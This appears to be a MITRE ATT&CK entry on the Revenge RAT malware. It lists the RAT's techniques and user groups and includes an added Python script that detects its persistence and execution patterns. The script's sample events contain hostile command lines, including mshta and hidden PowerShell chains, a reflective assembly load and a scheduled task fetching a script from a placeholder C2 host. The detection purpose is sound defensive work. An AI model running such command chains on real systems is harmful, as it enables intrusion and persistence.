S0379 Revenge RAT
Revenge RAT is a freely available remote access tool written in .NET (C#).[2][1]
| Item | Value |
|---|---|
| ID | S0379 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.2 |
| Created | 02 May 2019 |
| Last Modified | 17 November 2024 |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1123 | Audio Capture | Revenge RAT has a plugin for microphone interception.[2][1] |
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.004 | Winlogon Helper DLL | Revenge RAT sets the Shell value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon so that it is launched at logon and survives a system reboot.[2] |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Revenge RAT uses PowerShell to call the .NET Reflection.Assembly Load method, loading itself into memory to aid in execution.[1] |
| enterprise | T1059.003 | Windows Command Shell | Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine.[1] |
| enterprise | T1132 | Data Encoding | - |
| enterprise | T1132.001 | Standard Encoding | Revenge RAT uses Base64 to encode information sent to the C2 server.[2] |
| enterprise | T1202 | Indirect Command Execution | Revenge RAT uses the Forfiles utility to execute commands on the system.[1] |
| enterprise | T1105 | Ingress Tool Transfer | Revenge RAT has the ability to upload and download files.[2] |
| enterprise | T1056 | Input Capture | - |
| enterprise | T1056.001 | Keylogging | Revenge RAT has a plugin for keylogging.[2][1] |
| enterprise | T1003 | OS Credential Dumping | Revenge RAT has a plugin for credential harvesting.[2] |
| enterprise | T1021 | Remote Services | - |
| enterprise | T1021.001 | Remote Desktop Protocol | Revenge RAT has a plugin to perform RDP access.[2] |
| enterprise | T1053 | Scheduled Task/Job | - |
| enterprise | T1053.005 | Scheduled Task | Revenge RAT schedules tasks to run malicious scripts at different intervals.[1] |
| enterprise | T1113 | Screen Capture | Revenge RAT has a plugin for screen capture.[2] |
| enterprise | T1218 | System Binary Proxy Execution | - |
| enterprise | T1218.005 | Mshta | Revenge RAT uses mshta.exe to run malicious scripts on the system.[1] |
| enterprise | T1082 | System Information Discovery | Revenge RAT collects the CPU information, OS information, and system language.[2] |
| enterprise | T1016 | System Network Configuration Discovery | Revenge RAT collects the IP address and MAC address from the system.[2] |
| enterprise | T1033 | System Owner/User Discovery | Revenge RAT gathers the username from the system.[2] |
| enterprise | T1125 | Video Capture | Revenge RAT has the ability to access the webcam.[2][1] |
| enterprise | T1102 | Web Service | - |
| enterprise | T1102.002 | Bidirectional Communication | Revenge RAT used blogpost.com as its primary command and control server during a campaign.[1] |
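The persistence and execution rows above (Winlogon Shell value, PowerShell Reflection.Assembly loading, Forfiles, mshta.exe and scheduled tasks) translate directly into host triage checks. The following is an added example, not code from Revenge RAT, from ATT&CK or from the cited reports: it checks a Winlogon Shell value against the stock explorer.exe and runs simple detection rules over constructed process-creation records. The record field names (image, command_line) and the sample command lines are assumptions modelled loosely on Sysmon Event ID 1; the domain c2.example.invalid is a placeholder.

```python
"""Triage checks for the Revenge RAT behaviours catalogued on this page.

Added example, not Revenge RAT's code and not from the ATT&CK page. The
event records are constructed for illustration; the keys "image" and
"command_line" are assumed field names, roughly following Sysmon Event ID 1.
"""
import re
from typing import Dict, List, Optional

# A stock Windows install keeps Shell=explorer.exe under HKLM; the HKCU
# Winlogon key normally has no Shell value at all, so any HKCU value deserves
# a look. These are the only launch targets treated as benign; a payload
# named explorer.exe in another directory is still flagged.
ALLOWED_SHELLS = {"explorer.exe", "c:\\windows\\explorer.exe"}

# Interpreters that Revenge RAT chains through forfiles and schtasks.
SCRIPT_INTERPRETERS = ("mshta", "powershell", "wscript", "cscript")


def winlogon_shell_is_suspicious(value: Optional[str]) -> bool:
    """True if the Winlogon Shell value launches anything besides explorer.exe.

    The value may be a comma-separated list, e.g. 'explorer.exe,C:\\x\\rat.exe';
    appending a payload this way keeps the desktop working while adding persistence.
    """
    if not value:
        return False
    entries = [e.strip().strip('"').lower() for e in value.split(",") if e.strip()]
    return any(entry not in ALLOWED_SHELLS for entry in entries)


def _image_name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def classify_process_event(event: Dict[str, str]) -> List[str]:
    """Return the ATT&CK sub-techniques from this page that the event matches."""
    image = _image_name(event.get("image", ""))
    cl = event.get("command_line", "").lower()
    hits: List[str] = []

    # T1218.005: mshta running inline script or remote content. A plain local
    # .hta argument is deliberately not flagged here to keep the rule quiet.
    if image == "mshta.exe" and re.search(r"(?:vbscript|javascript):|https?://", cl):
        hits.append("T1218.005 mshta.exe running inline script or remote content")

    # T1202: forfiles is an admin tool; flag only when its /c payload launches
    # a script interpreter, so routine "cmd /c del @path" cleanups stay quiet.
    if image == "forfiles.exe":
        m = re.search(r"/c\s+(.*)$", cl)
        if m and any(i in m.group(1) for i in SCRIPT_INTERPRETERS):
            hits.append("T1202 forfiles /c launching a script interpreter")

    # T1059.001: PowerShell loading an assembly straight into memory.
    if image in ("powershell.exe", "pwsh.exe") and re.search(r"reflection\.assembly\]?::load", cl):
        hits.append("T1059.001 PowerShell Reflection.Assembly in-memory load")

    # T1053.005: a new scheduled task whose action is a script interpreter.
    if image == "schtasks.exe" and "/create" in cl and any(i in cl for i in SCRIPT_INTERPRETERS):
        hits.append("T1053.005 schtasks creating a task that runs a script interpreter")

    return hits


def scan_process_events(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run every rule over every event; one finding per (event, technique) pair."""
    findings = []
    for ev in events:
        for technique in classify_process_event(ev):
            findings.append({"technique": technique, "command_line": ev.get("command_line", "")})
    return findings


# Constructed sample records: four that mirror the chain described on this page
# and three benign look-alikes that the rules should leave alone.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\forfiles.exe",
     "command_line": r'forfiles /p C:\Windows\System32 /m notepad.exe /c "mshta.exe javascript:close(new ActiveXObject(\'WScript.Shell\').Run(\'powershell -w hidden\',0))"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe javascript:close(new ActiveXObject('WScript.Shell').Run('powershell -w hidden',0))"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"[Reflection.Assembly]::Load([Convert]::FromBase64String('TVqQAAMAAAAEAAAA'))\""},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "command_line": 'schtasks.exe /create /sc minute /mo 5 /tn "WindowsUpdateCheck" /tr "mshta.exe http://c2.example.invalid/stage.hta"'},
    {"image": r"C:\Windows\System32\forfiles.exe",
     "command_line": r'forfiles /p C:\Logs /s /m *.log /d -30 /c "cmd /c del @path"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks.exe /create /sc daily /tn "Backup" /tr "C:\Tools\backup.exe"'},
]

if __name__ == "__main__":
    print(winlogon_shell_is_suspicious(r'explorer.exe,"C:\Users\Public\svchost.exe"'))
    for f in scan_process_events(SAMPLE_EVENTS):
        print(f["technique"], "<-", f["command_line"])
```

On a live host the Shell value would come from reading HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon and the events from Sysmon or Security 4688 logs; the rules here are intentionally narrow (a local .hta or a forfiles cleanup is not flagged), so tune them against your own baseline before alerting on them.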
Groups That Use This Software
| ID | Name | References |
|---|---|---|
| G1018 | TA2541 | [3] |
| G0089 | The White Company | [2] |
References
1. Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved November 17, 2024.
2. Livelli, K., et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.
3. Larson, S. and Wise, J. (2022, February 15). Charting TA2541's Flight. Retrieved September 12, 2023.